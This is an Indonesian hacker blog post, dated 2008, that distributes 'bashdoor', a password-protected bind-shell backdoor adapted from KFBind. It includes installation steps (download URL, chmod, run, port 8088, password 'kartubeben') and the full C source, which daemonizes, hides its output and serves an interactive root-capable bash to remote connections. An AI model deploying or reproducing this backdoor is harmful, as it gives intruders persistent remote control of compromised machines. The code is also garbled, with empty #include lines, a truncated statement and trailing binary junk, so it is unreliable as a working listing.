Bashdoor

[ C O P Y L E F T ]

-------------------------------------------------------------------------------------
Title : Semua tentang bashdoor
Author : #kartubeben crew @ Dalnet
Thanks : semua yang telah mendukung
E-mail : m_beben@gawab.com
Website : www.kartubeben.com
Spesial : Kawan-kawan dari Secret Colony yang telah membuat KFBind backdoor
-------------------------------------------------------------------------------------



[ P E R H A T I A N ]

Saya tidak membuat source code ini. Source code asal saya ambil dari kelompok Secret
Colony yang telah membuat sebuah file yang luar biasa yang bernama KFBind. Saya
hanyalah seseorang yang memodifikasi sedikit dari file tersebut, tepatnya
memodifikasi pilihan shell dari shell sh menjadi shell bash.


[ C A R A P E N G G U N A A N]

Pertama-tama upload file bashdoor dari http://beben.united.net.kg/shell/bashdoor

Kemudian anda bisa merubah file tersebut dengan nama lain atau tidak merubahnya

Lalu berikan permisi x pada file bashdoor yang telah anda upload tersebut. caranya

chmod 755 bashdoor

Langkah selanjutnya jalankan bashdoor tersebut : ./bashdoor

Bashdoor ini bekerja di port: 8088 dengan password: kartubeben


[ U C A P A N T E R I M A K A S I H ]

Anggota Secret Colony yang telah membuat file ini, bang K-159 beserta #aikmel crew &
Moby beserta echo crew dan staff gak lupa buat kawan-kawan di #kartubeben @ dalnet
yang selalu mensupport saya.


[ S O U R C E C O D E ]

Rasanya tidak valid jika saya pribadi tidak memberikan source code hasil KFbind yang
telah dimodifikasi sangat sedikit oleh saya. Terima kasih

/*
** kFbind.c by KillFinger
**
** compiled on any linux machine:
**
** gcc bashdoor.c -o bashdoor
**
** This code was originally written by sd as bindtty.c
** And n0w actually modified by KillFinger oF SecretColony
** (KillFinger@linuxmail.org) for passwd protection
** Thanx to aLL the cr3w oF SecretColony Lab N Research Group
** sh0utz to ISD (IndoHack Security Development) f0r the sHarinG N rel4t10nsHip
**
** rEaD thiS fuCkin' soUrce c0de and cHange the passwd/port for y0ur
** conVenient
**
** I'vE g0t my sKILL-FINGERed. :)
**
*/

#define HOME "/"
#define TIOCSCTTY 0x540E
#define TIOCGWINSZ 0x5413
#define TIOCSWINSZ 0x5414
#define ECHAR 0x1d
#define PORT 8088 //disini letak port yang dijalankan
#define BUF 32768

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct winsize {
unsigned short ws_row;
unsigned short ws_col;
unsigned short ws_xpixel;
unsigned short ws_ypixel;
};

/* passwd protection by KillFinger oF SecretColony */

int sc;
char passwd[] = "kartubeben"; //di sini password yang kita pilih
char motd[] ="== Backdooring by SecretColony reDESIGN by KARTUBEBEN crew ==\n";

void kf_shell() {
char buffer[150];

write(sc, "passwd ", 7);
read(sc, buffer, sizeof(buffer));
if (!strncmp(buffer, passwd, strlen(passwd))) {
write(sc, motd, sizeof(motd));
}
else {
write(sc, "Access Denied!!!\n", 7);
close(sc); exit(0);
}
}

/* creates tty/pty name by index */
void get_tty(int num, char *base, char *buf)
{
char series[] = "pqrstuvwxyzabcde";
char subs[] = "0123456789abcdef";
int pos = strlen(base);
strcpy(buf, base);
buf[pos] = series[(num >> 4) & 0xF];
buf[pos+1] = subs[num & 0xF];
buf[pos+2] = 0;
}

/* search for free pty and open it */
int open_tty(int *tty, int *pty)
{
char buf[512];
int i, fd;

fd = open("/dev/ptmx", O_RDWR);
close(fd);

for (i=0; i < 256; i++) {
get_tty(i, "/dev/pty", buf);
*pty = open(buf, O_RDWR);
if (*pty < 0) continue;
get_tty(i, "/dev/tty", buf);
*tty = open(buf, O_RDWR);
if (*tty < 0) {
close(*pty);
continue;
}
return 1;
}
return 0;
}

/* to avoid creating zombies ;) */
void sig_child(int i)
{
signal(SIGCHLD, sig_child);
waitpid(-1, NULL, WNOHANG);
}

void hangout(int i)
{
kill(0, SIGHUP);
kill(0, SIGTERM);
}

int main()
{
int pid;
struct sockaddr_in serv;
struct sockaddr_in cli;
int sock;

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
perror("socket");
return 1;
}

bzero((char *) &serv, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = htonl(INADDR_ANY);
serv.sin_port = htons(PORT);
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
perror("bind");
return 1;
}
if (listen(sock, 5) < 0) {
perror("listen");
return 1;
}
printf("KARTUBEBEN backdoor telah dan sedang berjalan...\n\n"); fflush(stdout);
pid = fork();
if (pid !=0 ) {
printf("OK, telah berjalan di pid = %d\n", pid);
printf("Selamat menikmati KARTUBEBEN backdooring...\n");
return 0;
}

/* daemonize */
setsid();
chdir("/");
pid = open("/dev/null", O_RDWR);
dup2(pid, 0);
dup2(pid, 1);
dup2(pid, 2);
close(pid);
signal(SIGHUP, SIG_IGN);
signal(SIGCHLD, sig_child);
while (1) {
int scli;
int slen;
slen = sizeof(cli);
scli = accept(sock, (struct sockaddr *) &cli, &slen);
if (scli < 0) continue;
pid = fork();
if (pid == 0) {
int subshell;
int tty;
int pty;
fd_set fds;
char buf[BUF];
char *argv[] = {"bash", "-i", NULL}; //shellnya beben ganti di sini
#define MAXENV 256
#define ENVLEN 256
char *envp[MAXENV];
char envbuf[(MAXENV+2) * ENVLEN];
int j, i;
char home[256];
/* setup enviroment */
envp[0] = home;
sprintf(home, "HOME=%s", HOME);
j = 0;
do {
i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
envp[j+1] = &envbuf[j * ENVLEN];
j++;
if ((j >= MAXENV) || (i < ENVLEN)) break;
} while (envbuf[(j-1) * ENVLEN] != '\n');
envp[j+1] = NULL;

/* create new group */
setpgid(0, 0);

/* open slave & master side of tty */
if (!open_tty(&tty, &pty)) {
char msg[] = "Tidak dapat membuka pty, dadah... !\n";
write(scli, msg, strlen(msg));
close(scli);
exit(0);
}
/* fork child */
subshell = fork();
if (subshell == 0) {
/* close master */
close(pty);
/* attach tty */
setsid();
ioctl(tty, TIOCSCTTY);
/* close local part of connection */
close(scli);
close(sock);
signal(SIGHUP, SIG_DFL);
signal(SIGCHLD, SIG_DFL);
dup2(tty, 0);
dup2(tty, 1);
dup2(tty, 2);
close(tty);
kf_shell();
execve("/bin/bash", argv, envp); //shell beben ganti di sini
}
/* close slave */
close(tty);

signal(SIGHUP, hangout);
signal(SIGTERM, hangout);

while (1) {
/* watch tty and client side */
FD_ZERO(&fds);
FD_SET(pty, &fds);
FD_SET(scli, &fds);
if (select((pty > scli) ? (pty+1) : (scli+1),
&fds, NULL, NULL, NULL) < 0)
{
break;
}
if (FD_ISSET(pty, &fds)) {
int count;
count = read(pty, buf, BUF);
if (count <= 0) break;
if (write(scli, buf, count) <= 0) break;
}
if (FD_ISSET(scli, &fds)) {
int count;
unsigned char *p, *d;
d = buf;
count = read(scli, buf, BUF);
if (count <= 0) break;

/* setup win size */
p = memchr(buf, ECHAR, count);
if (p) {
unsigned char wb[5];
int rlen = count - ((ulong) p - (ulong) buf);
struct winsize ws;

/* wait for rest */
if (rlen > 5) rlen = 5;
memcpy(wb, p, rlen);
if (rlen < 5) {
read(scli, &wb[rlen], 5 - rlen);
}

/* setup window */
ws.ws_xpixel = ws.ws_ypixel = 0;
ws.ws_col = (wb[1] << 8) + wb[2];
ws.ws_row = (wb[3] << 8) + wb[4];
ioctl(pty, TIOCSWINSZ, &ws);
kill(0, SIGWINCH);

/* write the rest */
write(pty, buf, (ulong) p - (ulong) buf);
rlen = ((ulong) buf + count) - ((ulong)p+5);
if (rlen > 0) write(pty, p+5, rlen);
} else
if (write(pty, d, c waitpid(subshell, NULL, 0);
vhangup();
exit(0);
}
close(scli);
}
}
`C?ÉÀ’Á:Œ ÉØ7‚£&DÌOwòý)¸Ê3 ICƈðC“Xà¢Å¦Ì°ÂeîjœÅ€{§âHí3Uü@@9ÿƒšU1Y‰û\YŒ>

Sunday, November 9, 2008